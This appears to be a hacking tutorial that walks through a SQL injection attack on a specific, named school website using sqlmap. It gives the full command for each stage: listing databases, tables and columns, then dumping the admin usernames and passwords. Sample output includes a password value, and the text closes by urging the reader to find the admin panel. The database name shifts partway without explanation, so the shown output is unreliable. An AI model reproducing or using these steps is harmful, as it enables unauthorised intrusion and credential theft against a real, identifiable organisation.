First of all, we need a vulnerable target. Here it is:
http://www.alliedschools.edu.pk/main_news.php?news_id=52

The first step is to fetch the databases. The command will be like this one:
python ./sqlmap.py -u http://www.alliedschools.edu.pk/main_news.php?news_id=52 --dbs
Here:
-u stands for the URL which is vulnerable to SQL injection and
--dbs is used for fetching all the databases on the website

After the process of fetching the databases completes, the output will look something like this:
available databases(8)
[*] information_schema
[*] alliedschools_web

Now we are going to exploit the database alliedschools_web and fetch the tables present in it.
The command will change a little bit:
python ./sqlmap.py -u http://www.alliedschools.edu.pk/main_news.php?news_id=52 -D alliedschools_web --tables
Here:
-D is followed by the name of the database from which we want to fetch tables and
--tables is for fetching all the tables present in the database
After processing, we will get the tables present in the database "alliedschools_web".

After processing, we will get something like this:
Database: alliedschools_campus
[18 Tables ]
admin
campus

Now we are going to fetch the columns from the table admin of the database alliedschools_campus.
The command is:
python ./sqlmap.py -u http://www.alliedschools.edu.pk/main_news.php?news_id=52 -D alliedschools_campus -T admin --columns

Now we will get something like this:
Database: alliedschools_campus
Table : admin
[12 columns ]
admin_password
admin_username
admin_email

This is the last command, to get the admin username and password.
The command is:
python ./sqlmap.py -u http://www.alliedschools.edu.pk/main_news.php?news_id=52 -D alliedschools_campus -T admin -C admin_password,admin_username --dump

After the process finishes, we will get something like this:
Database: alliedschools_campus
Table : admin
[6 entries]
admin_password admin_username
$erver admin
...... ......
Now you have the admin password of the website. Find the admin panel.

